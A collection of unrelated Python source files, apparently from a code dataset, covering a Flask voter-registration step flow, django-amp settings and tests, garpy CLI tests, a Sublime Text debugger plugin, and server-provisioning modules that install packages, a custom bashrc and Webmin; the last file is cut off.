def _init_next_step(self):
"""
If the current step has a next step set, initialize the next step class and save it to self.
"""
if self.current_step.next_step:
next_step = globals()[self.current_step.next_step]
self.next_step = next_step()
def _init_prev_step(self):
"""
If the current step has a previous step set, initialize the previous step class and save it to self.
"""
if self.current_step.prev_step:
prev_step = globals()[self.current_step.prev_step]
self.prev_step = prev_step()
def vr_completed(self):
if self.registrant.vr_completed_at and self.registrant.try_value('vr_form', False):
return True
return False
def ab_completed(self):
if self.registrant.ab_completed_at and self.registrant.try_value('ab_forms', False):
return True
return False
def get_locale_url(self, endpoint):
lang_code = g.get('lang_code', None)
if lang_code:
return '/' + lang_code + endpoint
else:
return endpoint
def get_redirect_url(self):
"""
Should always return a url path. Look at the current step and determine if the user needs to:
A: Move on to next step.
B: Move back to previous step.
C: Stay at current step.
"""
# For Step 0 when no previous step exists
if not self.prev_step:
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
else:
return self.get_locale_url(self.current_step.endpoint)
# For the previous step iterate all of the requirements.
# If the requirement is not fulfilled return the previous step url
for req in self.prev_step.all_requirements():
# if a requirement is missing return the endpoint for the previous step
if not self.registrant.has_value_for_req(req):
return self.get_locale_url(self.prev_step.endpoint)
# if the step has been completed move on
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
#default to returning current step
return self.get_locale_url(self.current_step.endpoint)
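# Example usage (illustrative sketch: the registrant and current step objects
# are assumed to come from the surrounding request handling):
#
#   manager = SessionManager(registrant, current_step)
#   return redirect(manager.get_redirect_url())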
```
#### File: services/steps/step_1.py
```python
from app.services.steps import Step
from flask import g
# this is a placeholder. No action required, just routing to change-or-apply
class Step_1(Step):
form_requirements = []
step_requirements = []
endpoint = '/change-or-apply'
prev_step = 'Step_0'
next_step = None
is_complete = False
def run(self):
return True
```
#### File: services/steps/step_ab_3.py
```python
from app.services.steps import Step
from flask import g
from app.services.usps_api import USPS_API
class Step_AB_3(Step):
form_requirements = ['addr', 'city', 'state', 'zip']
step_requirements = ['addr_lookup_complete']
address_order = ['current_address']
endpoint = '/ab/address'
addr_lookup_complete = False
prev_step = 'Step_AB_1'
next_step = None
def run(self):
if self.is_complete:
return True
if self.form_payload.get('has_mail_addr'):
self.form_requirements = self.form_requirements + ['mail_addr', 'mail_city', 'mail_state', 'mail_zip']
if not self.verify_form_requirements():
return False
usps_api = USPS_API(self.form_payload)
self.validated_addresses = usps_api.validate_addresses()
self.addr_lookup_complete = True
self.is_complete = True
self.next_step = 'Step_AB_5'
return True
``` |
{
"source": "8ByteCore8/django-amp",
"score": 2
} |
#### File: django-amp/amp/settings.py
```python
from django.conf import settings as django_settings
import django
class SettingsProxy(object):
def __init__(self, settings, defaults):
self.settings = settings
self.defaults = defaults
def __getattr__(self, attr):
try:
return getattr(self.settings, attr)
except AttributeError:
try:
return getattr(self.defaults, attr)
except AttributeError:
raise AttributeError(
u'settings object has no attribute "%s"' % attr)
class defaults(object):
USE_AMP = False
AMP_GET_PARAMETER = u'amp'
AMP_GET_VALUE = u'1'
AMP_TEMPLATE_PREFIX = u"amp/"
AMP_GEN_PATH = True
AMP_DEFAULT_WIDTH = 1.5
AMP_DEFAULT_HEIGHT = 1
AMP_IMG_TEMPLATE = u'<amp-img src="$src" width="$width" height="$height" layout="responsive" alt="$alt"></amp-img>'
AMP_IFRAME_TEMPLATE = u'<amp-iframe width="$width" height="$height" sandbox="allow-scripts allow-same-origin" layout="responsive" frameborder="0" src="$src"></amp-iframe>'
settings = SettingsProxy(django_settings, defaults)
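# Example of the fallback behaviour (illustrative: the attribute below is one
# of the defaults defined above):
#
#   settings.AMP_GET_PARAMETER   # value from Django settings if defined there,
#                                # otherwise the default u'amp'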
```
#### File: django-amp/amp/tests.py
```python
from django.test import TestCase
from . import get_template_name, set_amp_detect, get_amp_detect
from .settings import settings
# Create your tests here.
class AMPTestCase(TestCase):
def setUp(self):
pass
def test_get_template_name(self):
template_name = 'test/index.html'
settings.USE_AMP = True
set_amp_detect(False)
self.assertEqual(get_template_name(template_name), 'test/index.html')
set_amp_detect(True)
settings.AMP_USE_TEMPLATE_POSTFIX = False
self.assertEqual(get_template_name(
template_name), 'amp/test/index.html')
settings.AMP_USE_TEMPLATE_POSTFIX = True
self.assertEqual(get_template_name(
template_name), 'test/amp/index.html')
def test_amp_detect(self):
settings.USE_AMP = False
set_amp_detect(True)
self.assertEqual(get_amp_detect(), False)
set_amp_detect(False)
self.assertEqual(get_amp_detect(), False)
settings.USE_AMP = True
set_amp_detect(True)
self.assertEqual(get_amp_detect(), True)
set_amp_detect(False)
self.assertEqual(get_amp_detect(), False)
``` |
{
"source": "8cH9azbsFifZ/garpy",
"score": 2
} |
#### File: garpy/tests/test_cli.py
```python
from pathlib import Path
from unittest.mock import patch
from click.testing import CliRunner
from garpy import cli
class TestCLI:
"""cli.main"""
def test_download_username_password_only(self):
with patch.object(cli.GarminClient, "_authenticate", return_value=None):
with patch.object(cli.ActivitiesDownloader, "__call__", return_value=None):
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(
cli.main, ["download", "-u", "dummy", "-p", "password"]
)
assert result.exit_code == 0
def test_download_several_formats(self):
with patch.object(cli.GarminClient, "_authenticate", return_value=None):
with patch.object(cli.ActivitiesDownloader, "__call__", return_value=None):
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(cli.main, ["download", "-u", "dummy", "-p", "password", "-f", "gpx", "-f", "fit"])
assert result.exit_code == 0
def test_download_fails_with_existing_file_as_bakcup_dir(self, tmp_path):
with patch.object(cli.GarminClient, "_authenticate", return_value=None):
with patch.object(cli.ActivitiesDownloader, "__call__", return_value=None):
runner = CliRunner()
with runner.isolated_filesystem():
backup_dir = Path(tmp_path) / "text_file"
backup_dir.touch()
result = runner.invoke(cli.main, ["download", "-u", "dummy", "-p", "password", str(backup_dir)])
assert result.exit_code == 1
assert (
str(result.exception)
== "The provided backup directory exists and is a file"
)
``` |
{
"source": "8cloud8/terraform-modules",
"score": 2
} |
#### File: lambda-function/test/test_lambda.py
```python
import boto3
client = boto3.client('sts')
print("loading function")
def whoami_handler(event, context):
print ('Hello from aws identity:' + client.get_caller_identity()['Arn'])
``` |
{
"source": "8ctopus/sublime_debugger",
"score": 3
} |
#### File: modules/core/log.py
```python
from ..typecheck import *
_should_log_exceptions = True
_should_log_error = True
_should_log_info = True
def log_configure(log_info: bool, log_errors: bool, log_exceptions: bool):
global _should_log_exceptions
global _should_log_error
global _should_log_info
_should_log_exceptions = log_exceptions
_should_log_error = log_errors
_should_log_info = log_info
def log_error(*args) -> None:
if not _should_log_error:
return
print(*args)
def log_exception(*args) -> None:
import traceback
if not _should_log_exceptions:
return
print(*args, end='')
print(traceback.format_exc())
def log_info(*args) -> None:
if not _should_log_info:
return
print(*args)
class Logger(Protocol):
def error(self, value: str):
...
def info(self, value: str):
...
```
#### File: debugger/adapter/install.py
```python
from ...typecheck import *
from ...import core
from ...libs import certifi
import os
import shutil
import zipfile
import gzip
import urllib.request
import json
import sublime
def _adapters_path() -> str:
return os.path.join(core.current_package(), 'data', 'debug_adapters')
class AdapterInstall:
@core.coroutine
def install(self, log: core.Logger) -> core.awaitable[None]: ...
@property
def installed(self) -> bool: ...
def installed_info(self) -> 'AdapterInstalledInformation': ...
class AdapterInstalledInformation:
def __init__(self, version: int, snippets: list):
self.version = version
self.snippets = snippets
class VSCodeAdapterInstall:
def __init__(self, name: str, url: str) -> None:
self.name = name
self.url = url
self.path = os.path.join(_adapters_path(), self.name)
@staticmethod
def from_json(json: dict) -> 'VSCodeAdapterInstall':
return VSCodeAdapterInstall(json['name'], json['url'])
@property
def installed(self) -> bool:
return os.path.isfile(os.path.join(self.path, 'sublime_debugger.json'))
def installed_info(self) -> AdapterInstalledInformation:
snippets_output_file = os.path.join(self.path, 'sublime_debugger.json')
snippets_file_exists = os.path.isfile(snippets_output_file)
if snippets_file_exists:
with open(snippets_output_file) as file:
j = json.load(file)
return AdapterInstalledInformation(j.get('version', 0), j['configurationSnippets'])
return AdapterInstalledInformation(0, [])
@core.coroutine
def install(self, log: core.Logger) -> core.awaitable[None]:
try:
log.info('Installing adapter: {}'.format(self.name))
yield from core.run_in_executor(self.downalod_and_extract_blocking, log)
vscode_package_file = os.path.join(self.path, 'extension', 'package.json')
snippets_output_file = os.path.join(self.path, 'sublime_debugger.json')
snippets = [] #type: List[dict]
with open(vscode_package_file, "rb") as file:
j = sublime.decode_value(file.read().decode('utf-8'))
version = j.get('version')
for debugger in j.get('contributes', {}).get('debuggers', []):
snippets.extend(debugger.get('configurationSnippets', []))
with open(snippets_output_file, 'w') as snippets_file:
sublime_adapter_info = {
'configurationSnippets': snippets,
'version': version
}
content = json.dumps(sublime_adapter_info)
# strip out unescaped stuff
# FIXME this isn't correct... but good enough for now...
content = content.replace('^\\\"', '')
content = content.replace('\\\"', '')
snippets_file.write(content)
log.info('Finished Installing adapter: {}'.format(self.name))
except Exception as e:
log.info('Failled Finished Installing adapter: {}'.format(e))
def downalod_and_extract_blocking(self, log: core.Logger):
def log_info(value: str):
core.call_soon_threadsafe(log.info, value)
# ensure adapters folder exists
adapters_path = _adapters_path()
if not os.path.isdir(adapters_path):
os.mkdir(adapters_path)
if os.path.isdir(self.path):
log_info('Removing existing adapter...')
shutil.rmtree(_abspath_fix(self.path))
log_info('done')
log_info('downloading: {}'.format(self.url))
request = urllib.request.Request(self.url, headers={
'Accept-Encoding': 'gzip'
})
response = urllib.request.urlopen(request, cafile=certifi.where())
if response.getcode() != 200:
raise core.Error('Bad response from server, got code {}'.format(response.getcode()))
os.mkdir(self.path)
content_encoding = response.headers.get('Content-Encoding')
if content_encoding == 'gzip':
data_file = gzip.GzipFile(fileobj=response) #type: ignore
else:
data_file = response
archive_name = '{}.zip'.format(self.path)
with open(archive_name, 'wb') as out_file:
copyfileobj(data_file, out_file, log_info, int(response.headers.get('Content-Length', '0')))
log_info('extracting zip... ')
with ZipfileLongPaths(archive_name) as zf:
zf.extractall(self.path)
log_info('done')
os.remove(archive_name)
# https://stackoverflow.com/questions/29967487/get-progress-back-from-shutil-file-copy-thread
def copyfileobj(fsrc, fdst, log_info, total, length=128*1024):
copied = 0
while True:
buf = fsrc.read(length)
if not buf:
break
fdst.write(buf)
copied += len(buf)
log_info("{:.2f} mb {}%".format(copied/1024/1024, int(copied/total*100)))
# Fix for long file paths on windows not being able to be extracted from a zip file
# Fix for extracted files losing their permission flags
# https://stackoverflow.com/questions/40419395/python-zipfile-extractall-ioerror-on-windows-when-extracting-files-from-long-pat
# https://stackoverflow.com/questions/39296101/python-zipfile-removes-execute-permissions-from-binaries
class ZipfileLongPaths(zipfile.ZipFile):
def _path(self, path, encoding=None):
return _abspath_fix(path)
def extract(self, member, path=None, pwd=None):
if not isinstance(member, zipfile.ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
ret_val = self._extract_member(member, path, pwd)
attr = member.external_attr >> 16
os.chmod(ret_val, attr)
return ret_val
def _extract_member(self, member, targetpath, pwd):
targetpath = self._path(targetpath)
return zipfile.ZipFile._extract_member(self, member, targetpath, pwd) #type: ignore
def _abspath_fix(path):
if core.platform.windows:
path = os.path.abspath(path)
if path.startswith("\\\\"):
path = "\\\\?\\UNC\\" + path[2:]
else:
path = "\\\\?\\" + path
return path
```
#### File: modules/debugger/config.py
```python
from .. typecheck import *
from .. import core
from .adapter import Configuration
from .breakpoints import Breakpoints
import sublime
import os
import json
def _project_data_file(project_path: str) -> str:
import hashlib
hash = hashlib.sha224(project_path.encode('utf-8')).hexdigest()
return os.path.join(core.current_package(), "data/{}.json".format(hash))
class PersistedData:
def __init__(self, project_name: str) -> None:
self.project_name = project_name
self.json = {} #type: dict
VERSION_NUMBER = 0
self.json["version"] = VERSION_NUMBER
try:
file_name = _project_data_file(project_name)
file = open(file_name, 'r+')
contents = file.read()
file.close()
j = json.loads(contents)
if j["version"] == VERSION_NUMBER:
self.json = j
except FileNotFoundError:
pass
def save_breakpoints(self, breakpoints: Breakpoints) -> None:
self.json['breakpoints'] = breakpoints.into_json()
def load_breakpoints(self, breakpoints: Breakpoints):
breakpoints.load_from_json(self.json.get('breakpoints', {}))
def save_configuration_option(self, configuration: Configuration) -> None:
self.json['config_name'] = configuration.name
self.json['config_maybe_at_index'] = configuration.index
def load_configuration_option(self, configurations: List[Configuration]) -> Optional[Configuration]:
config_name = self.json.get('config_name')
config_maybe_at_index = self.json.get('config_maybe_at_index')
if config_name is None or config_maybe_at_index is None:
return None
try:
configuration = configurations[config_maybe_at_index]
if configuration.name == config_name:
return configuration
except IndexError:
pass
for configuration in configurations:
if configuration.name == config_name:
return configuration
return None
def save_to_file(self) -> None:
file_name = _project_data_file(self.project_name)
data = json.dumps(self.json, indent='\t', sort_keys=True)
file = open(file_name, 'w+')
        file.write(data)
file.close()
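# Example usage (illustrative sketch: the project name and Breakpoints instance
# are assumed to come from the active window/session):
#
#   data = PersistedData(project_name)
#   data.load_breakpoints(breakpoints)
#   # ... later, after breakpoints change ...
#   data.save_breakpoints(breakpoints)
#   data.save_to_file()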
```
#### File: modules/debugger/util.py
```python
from ..typecheck import *
from ..import core
from ..import ui
import sublime
import re
class SettingsChangedCallback:
id = 0
def __init__(self, settings: List[sublime.Settings], on_changed: Callable[[], None]) -> None:
        SettingsChangedCallback.id += 1
self.settings = settings
        self.key = 'SettingsChangedCallback{}'.format(SettingsChangedCallback.id)
for setting in settings:
setting.add_on_change(self.key, on_changed)
def dispose(self) -> None:
for setting in self.settings:
setting.clear_on_change(self.key)
class WindowSettingsCallback:
def __init__(self, window: sublime.Window, on_changed: Callable[[], None]):
self.window = window
        self.settings_changed_callback = None #type: Optional[SettingsChangedCallback]
self.on_changed = on_changed
self.on_view_updated = ui.view_activated.add(self.on_update_settings_view)
view = window.active_view()
if view:
self.update(view)
def on_update_settings_view(self, view: sublime.View):
if view.window() == self.window:
self.update(view)
def update(self, view: sublime.View):
core.log_info("updating settings callback view")
if self.settings_changed_callback:
self.settings_changed_callback.dispose()
self.settings_changed_callback = None
plugin_settings = sublime.load_settings('debugger.sublime-settings')
view_settings = view.settings()
        self.settings_changed_callback = SettingsChangedCallback([plugin_settings, view_settings], self.on_changed)
def dispose(self):
self.on_view_updated.dispose()
if self.settings_changed_callback:
self.settings_changed_callback.dispose()
self.settings_changed_callback = None
def get_setting(view: Optional[sublime.View], setting: str, default: Any = None) -> Any:
plugin_settings = sublime.load_settings('debugger.sublime-settings')
plugin_setting = plugin_settings.get(setting, default)
if not view:
return plugin_setting
project_setting = view.settings().get("debug." + setting, plugin_setting)
return project_setting
```
#### File: debugger/views/breakpoints_panel.py
```python
from ...typecheck import *
from ...import ui
from ...import core
from ..breakpoints import (
Breakpoints,
IBreakpoint,
SourceBreakpoint,
DataBreakpoint,
FunctionBreakpoint,
ExceptionBreakpointsFilter,
)
from .layout import breakpoints_panel_width
from .import css
import os
import sublime
class BreakpointsPanel(ui.div):
def __init__(self, breakpoints: Breakpoints) -> None:
super().__init__()
self.breakpoints = breakpoints
self.selected = None
# FIXME put in on activate/deactivate
breakpoints.source.on_updated.add(self._updated)
breakpoints.filters.on_updated.add(self._updated)
breakpoints.data.on_updated.add(self._updated)
breakpoints.function.on_updated.add(self._updated)
def _updated(self, data: Any) -> None:
self.dirty()
def on_select(self, breakpoint: IBreakpoint) -> None:
if isinstance(breakpoint, DataBreakpoint):
self.breakpoints.data.edit(breakpoint).run()
return
if isinstance(breakpoint, FunctionBreakpoint):
self.breakpoints.function.edit(breakpoint).run()
return
if isinstance(breakpoint, ExceptionBreakpointsFilter):
self.breakpoints.filters.edit(breakpoint).run()
return
if isinstance(breakpoint, SourceBreakpoint):
self.breakpoints.source.edit(breakpoint).run()
return
assert False, "unreachable"
def on_toggle(self, breakpoint: IBreakpoint) -> None:
if isinstance(breakpoint, DataBreakpoint):
self.breakpoints.data.toggle(breakpoint)
return
if isinstance(breakpoint, FunctionBreakpoint):
self.breakpoints.function.toggle(breakpoint)
return
if isinstance(breakpoint, ExceptionBreakpointsFilter):
self.breakpoints.filters.toggle(breakpoint)
return
if isinstance(breakpoint, SourceBreakpoint):
self.breakpoints.source.toggle(breakpoint)
return
assert False, "unreachable"
def render(self) -> ui.div.Children:
items = [] #type: List[ui.div]
for breakpoints in (self.breakpoints.filters, self.breakpoints.function, self.breakpoints.data, self.breakpoints.source):
for breakpoint in breakpoints: #type: ignore
if breakpoint.tag:
tag_and_name = [
ui.span(css=css.button)[
ui.text(breakpoint.tag, css=css.label),
],
ui.text(breakpoint.name, css=css.label_secondary_padding),
]
else:
tag_and_name = [
ui.text(breakpoint.name, css=css.label_secondary),
]
items.append(ui.div(height=3)[
ui.click(lambda breakpoint=breakpoint: self.on_toggle(breakpoint))[ #type: ignore
ui.icon(breakpoint.image),
],
ui.click(lambda breakpoint=breakpoint: self.on_select(breakpoint))[ #type: ignore
tag_and_name
]
])
return items
```
#### File: debugger/views/selected_line.py
```python
from ... typecheck import *
from ... import ui
from . import css
import sublime
class UnderlineComponent(ui.div):
def __init__(self) -> None:
super().__init__()
def render(self) -> ui.div.Children:
return [
ui.div(width=1000, height=0.15, css=css.selected),
]
class SelectedLineText(ui.div):
def __init__(self, text: str) -> None:
super().__init__()
self.text = text
def render(self) -> ui.div.Children:
return [
ui.div(width=25, height=2.5)[
ui.text(self.text, css=css.selected_text),
],
]
class SelectedLine:
def __init__(self, view: sublime.View, line: int, text: str):
# note sublime lines are 0 based not 1 based
pt_current_line = view.text_point(line - 1, 0)
pt_prev_line = view.text_point(line - 2, 0)
pt_next_line = view.text_point(line, 0)
line_prev = view.line(pt_current_line)
line_current = view.line(pt_prev_line)
self.top_line = ui.Phantom(UnderlineComponent(), view, line_current, sublime.LAYOUT_BELOW)
self.text = ui.Phantom(SelectedLineText(text), view, sublime.Region(pt_next_line - 1, pt_next_line - 1), sublime.LAYOUT_INLINE)
self.bottom_line = ui.Phantom(UnderlineComponent(), view, line_prev, sublime.LAYOUT_BELOW)
def dispose(self):
self.top_line.dispose()
self.text.dispose()
self.bottom_line.dispose()
```
#### File: debugger/views/sources.py
```python
from ...typecheck import *
from ...import dap
from ...import core
from ...import ui
from ..debugger_session import Sources
from . import css
class SourcesView(ui.div):
def __init__(self, sources: Sources, on_click: Callable[[dap.Source], None]):
super().__init__()
self.sources = sources
self.on_click = on_click
def added(self, layout: ui.Layout):
self.on_updated_handle = self.sources.on_updated.add(self.dirty)
def removed(self):
self.on_updated_handle.dispose()
def render(self) -> ui.div.Children:
items = []
for source in self.sources.sources:
items.append(SourceView(source, self.on_click))
return [
ui.div()[items]
]
class SourceView(ui.div):
def __init__(self, source: dap.Source, on_click: Callable[[dap.Source], None]):
super().__init__()
self.source = source
self.on_click = on_click
def render(self) -> ui.div.Children:
items = [
ui.div(height=3)[
ui.click(lambda: self.on_click(self.source))[
ui.text(self.source.path or self.source.name or "<no source name>", css=css.label_secondary)
]
]
]
for sub_source in self.source.sources:
items.append(SourceView(sub_source, self.on_click))
return items
```
#### File: modules/ui/__init__.py
```python
from .. import core
from .render import *
from .events import (
GutterEvent,
HoverEvent,
ViewEventsListener,
view_loaded,
view_activated,
view_text_hovered,
view_gutter_hovered,
view_gutter_clicked,
view_selection_modified,
view_modified,
view_drag_select)
from .html import div, span, text, icon, click, code
from .css import css
from .layout import *
from .image import *
from .input import *
from .align import text_align
import os
from ..libs import asyncio
_update_timer = None #type: Optional[Timer]
def startup() -> None:
Images.shared = Images()
global _update_timer
_update_timer = Timer(update, 2, True)
def shutdown() -> None:
if _update_timer:
_update_timer.dispose()
perform_render()
``` |
{
"source": "8cylinder/boss",
"score": 2
} |
#### File: boss/src/bash.py
```python
import os
import sys
from dist import Dist
import datetime
import subprocess
import shlex
# noinspection PyUnresolvedReferences
from errors import *
from util import display_cmd
# noinspection PyUnresolvedReferences
import util
class Bash:
APTUPDATED = False
info_messages = []
WWW_USER = 'www-data'
def __init__(self, dry_run=False, args=None):
self.ok_code = 0
self.requires = []
self.apt_pkgs = []
self.provides = []
self.distro = Dist()
self.dry_run = dry_run
self.args = args
self.scriptname = os.path.basename(__file__)
if args and not dry_run:
# action = args.subparser_name
self.log(self.__class__.__name__)
self.now = datetime.datetime.now().strftime('%y-%m-%d-%X')
@staticmethod
def log(name):
log_name = '~/boss-installed-modules'
mod = '{}\n'.format(name)
try:
with open(os.path.expanduser(log_name), 'r') as f:
installed_mods = f.readlines()
except FileNotFoundError:
installed_mods = []
installed_mods = set(installed_mods)
installed_mods.add(mod)
with open(os.path.expanduser(log_name), 'w') as f:
f.writelines(installed_mods)
def sed(self, sed_exp, config_file):
new_ext = '.original-{}'.format(self.now)
sed_cmd = 'sudo sed --in-place="{}" "{}" "{}"'.format(new_ext, sed_exp, config_file)
self.run(sed_cmd)
def append_to_file(self, filename, text, user=None, backup=True, append=True):
if backup:
new_ext = '.original-{}'.format(self.now)
copy_cmd = 'sudo cp "{file}" "{file}{now}"'.format(
file=filename, now=new_ext)
self.run(copy_cmd)
www_user = ''
if user == self.WWW_USER:
www_user = '-u {}'.format(self.WWW_USER)
append_flag = ''
if append is True:
append_flag = '-a'
add_cmd = 'echo | sudo {user} tee {append} "{file}" <<EOF\n{text}\nEOF'.format(
text=text, file=filename, user=www_user, append=append_flag)
self.run(add_cmd, wrap=False)
def apt(self, progs):
self._apt(progs)
def install(self):
self._apt(self.apt_pkgs)
return True
def pre_install(self):
return True
def post_install(self):
return True
def run(self, cmd, wrap=True, capture=False, comment=False):
if wrap:
pretty_cmd = ' '.join(cmd.split())
display_cmd(pretty_cmd, wrap=True, script=self.args.generate_script, comment=comment)
else:
display_cmd(cmd, wrap=False, script=self.args.generate_script,
comment=comment)
if self.args.dry_run or self.args.generate_script:
return
if capture:
# result = subprocess.run(cmd, shell=True, check=True, executable='/bin/bash', stdout=subprocess.PIPE)
result = subprocess.check_output(cmd, shell=True, executable='/bin/bash')
sys.stdout.flush()
else:
# result = subprocess.run(cmd, shell=True, check=True, executable='/bin/bash')
result = subprocess.check_call(cmd, shell=True, executable='/bin/bash')
return result
def curl(self, url, output, capture=False):
cmd = 'curl -sSL {url} --output {output}'.format(
url=url, output=output)
result = self.run(cmd, capture=capture)
return result
def restart_apache(self):
"""Restart Apache using the apropriate command
Details about wether to use service or systemctl
https://askubuntu.com/a/903405"""
if self.distro == Dist.UBUNTU:
self.run('sudo service apache2 restart')
else:
util.error('restart_apache has unknown platform')
def _apt(self, packages):
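        # Install the given packages non-interactively, running apt-get update only once
        # per invocation (tracked by the Bash.APTUPDATED class flag); self.dry_run maps
        # to apt-get's --dry-run flag.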
dry = '--dry-run' if self.dry_run else ''
packages = ' '.join(packages)
if not packages:
return False
if not Bash.APTUPDATED:
self.run('sudo apt-get --quiet update')
# self.run('sudo apt-get --quiet --yes upgrade') # not really necessary
Bash.APTUPDATED = True
self.run('export DEBIAN_FRONTEND=noninteractive; sudo apt-get {dry} --yes --quiet install {packages}'.format(
dry=dry, packages=packages))
return True
def info(self, title, msg):
self.info_messages.append([title, msg])
```
#### File: src/mods/aptproxy.py
```python
from bash import Bash
from dist import Dist
from errors import *
class AptProxy(Bash):
"""Use the host machine's apt proxy
apt-cacher-ng needs to be installed and configured on the host:
1. sudo apt install apt-cacher-ng
2. echo 'Acquire::http::Proxy "http://<HOST IP>:3142";' | sudo tee /etc/apt/apt.conf.d/00aptproxy
Installation can be checked by going to http://<HOST IP>:3142/acng-report.html
Then when using the `aptproxy` module, it will create a config
file in apt.conf.d to configure apt to use the host's apt cache by
running the following command:
`echo 'Acquire::http::Proxy "http://<HOST IP>:3142";' | sudo tee /etc/apt/apt.conf.d/00aptproxy`"""
conf_file = '/etc/apt/apt.conf.d/00aptproxy'
provides = ['aptproxy']
requires = []
title = 'Apt Proxy'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def post_install(self):
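        # Point apt at the host's apt-cacher-ng instance (port 3142) by writing the
        # Acquire::http::Proxy setting into /etc/apt/apt.conf.d/00aptproxy.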
host_ip = self.args.host_ip
proxy_setting = '\'Acquire::http::Proxy "http://{}:3142";\''.format(host_ip)
        cmd = 'echo {setting} | sudo tee {conf}'.format(
            setting=proxy_setting,
            conf=self.conf_file
        )
self.run(cmd)
```
#### File: src/mods/bashrc.py
```python
import os
from bash import Bash
from dist import Dist
from errors import *
class Bashrc(Bash):
"""A custom bashrc from GitHub and symlink boss to ~/bin/
1. Downloads a bashrc from GitHub and creates a bin dir in the $HOME dir.
    2. Backs up the original .bashrc
    3. Symlinks ~/bin/bashrc to ~/.bashrc
    4. Symlinks /project/boss to ~/bin/boss"""
provides = ['bashrc']
requires = []
title = 'Custom .bashrc'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.apt_pkgs = ['emacs-nox']
def install_bashrc(self):
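        # Download the bashrc files from GitHub into ~/bin, back up a non-symlinked
        # ~/.bashrc, and link ~/.bashrc to the downloaded ~/bin/bashrc.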
self.run('if [[ ! -d $HOME/bin ]]; then mkdir $HOME/bin; fi')
gh_files = {
'bashrc': 'https://raw.githubusercontent.com/8cylinder/bin/master/bashrc',
'bashrc_prompt.py': 'https://raw.githubusercontent.com/8cylinder/bin/master/bashrc_prompt.py',
'bashrc_prompt.themes': 'https://raw.githubusercontent.com/8cylinder/bin/master/bashrc_prompt.themes',
}
for ghname, ghurl in gh_files.items():
self.curl(ghurl, '$HOME/bin/' + ghname)
# if .bashrc is not a link, back it up
self.run('if [[ ! -L $HOME/.bashrc ]]; then mv $HOME/.bashrc $HOME/.bashrc.original; fi')
# if .bashrc does not exist, make a link to bin/bashrc
self.run('if [[ ! -e $HOME/.bashrc ]]; then ln -s $HOME/bin/bashrc $HOME/.bashrc; fi')
# self.run('echo -e "\n\nalias emacs=\'jmacs\'\n" >> $HOME/bin/bashrc')
self.run('chmod +x $HOME/bin/bashrc_prompt.py')
def link_boss(self):
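        # Create a symlink to this file in ~/bin unless one already exists.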
source = __file__
name = os.path.basename(source)
        # $HOME is left unexpanded here and resolved by the shell in the command below
        dest = os.path.join('$HOME/bin', name)
self.run('if [[ ! -h {} ]]; then ln -s {} {}; fi'.format(dest, source, dest))
def post_install(self):
self.install_bashrc()
self.link_boss()
def uninstall(self):
self.run('if [[ -d $HOME/bin ]]; then sudo rm -rf $HOME/bin; fi')
# if .bashrc.original exists, restore it
        self.run('if [[ -e $HOME/.bashrc.original ]]; then mv $HOME/.bashrc.original $HOME/.bashrc; fi')
```
#### File: src/mods/example.py
```python
from bash import Bash
from dist import Dist
from errors import *
class Example(Bash):
"""Short doc string here for the list command
The full doc string is used for the help command. This should list
the command line args this module needs.
Required class variables:
provides
requires
title
"""
    # self.provides is used for dependency management; each module can
# provide more than one. See lamp.py for an example.
provides = ['example']
# Any mods that this mod needs as a prerequisite. These names are
# matched to provides.
requires = ['example2', 'example3']
# A human readable name that is used in help and listing.
title = 'Pretty name'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# List of apt packages to be installed via apt.
self.apt_pkgs = ['package1', 'package2']
        # self.distro can be used to do different things based on which
        # version of Linux is being used.
if self.distro == (Dist.UBUNTU, Dist.V18_04):
self.apt_pkgs = ['package1', 'package2', '18.04_package_only']
# bash provides several methods
self.sed('sed expression', 'file')
self.apt(['list', 'of', 'packages'])
self.curl('url', 'output-filename', capture=True)
self.info('title', 'message')
self.restart_apache()
self.run('any valid bash command string', wrap=True, capture=False)
# capture the result of the command
result = self.run('any valid bash command string', wrap=True, capture=True)
# Run before apt installs the apt_pkgs.
def pre_install(self):
pass
# Run after apt installs the apt_pkgs.
def post_install(self):
pass
```
#### File: src/mods/first.py
```python
from bash import Bash
from dist import Dist
from errors import *
class First(Bash):
"""Misc apps that are useful
The timezone is set to America/Los_Angeles and Emacs is configured
    as the default editor.
"""
provides = ['first']
requires = []
title = 'First'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.distro > (Dist.UBUNTU, Dist.V14_04):
self.apt_pkgs = [
'tree', 'elinks', 'virt-what', 'silversearcher-ag', 'unzip',
'zip', 'htop', 'source-highlight', 'whois', 'curl', 'figlet', 'ntp', 'locate'
]
# self.apt_pkgs += ['joe']
            self.apt_pkgs += ['emacs-nox']  # adds approx. 100 MB
elif self.distro == (Dist.UBUNTU, Dist.V14_04):
self.apt_pkgs = [
'tree', 'elinks', 'virt-what', 'silversearcher-ag', 'unzip',
'htop', 'source-highlight', 'whois', 'curl', 'figlet'
]
# self.apt_pkgs += ['joe']
            self.apt_pkgs += ['emacs24-nox']  # adds approx. 100 MB
def pre_install(self):
pass
def post_install(self):
# set timezone
tz = 'America/Los_Angeles'
self.run('sudo timedatectl set-timezone {}'.format(tz))
self.bash_settings()
def bash_settings(self):
bashrc = "$HOME/.bashrc"
editor = 'emacs'
settings = '''
export HISTSIZE=-1
export HISTFILESIZE=-1
export HISTTIMEFORMAT="%F %T "
shopt -s histappend
export EDITOR='{editor}'
export VISUAL='{editor}'
export SUDO_EDITOR='{editor}'
'''.format(editor=editor)
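        # Strip the leading indentation the triple-quoted literal picks up from the source file.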
settings = '\n'.join([i[10:] for i in settings.split('\n')])
self.append_to_file(bashrc, settings, backup=True)
```
#### File: src/mods/webmin.py
```python
from bash import Bash
from dist import Dist
from errors import *
class Webmin(Bash):
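    """Webmin web-based administration console, installed from the Webmin apt repository"""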
provides = ['webmin']
requires = ['apache2', 'php', 'cert']
title = 'Webmin console'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.apt_pkgs = ['webmin']
def pre_install(self):
# add webmin to sources.list, get PGP key
cmds = [
'sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak',
'echo "deb http://download.webmin.com/download/repository sarge contrib" | sudo tee -a /etc/apt/sources.list',
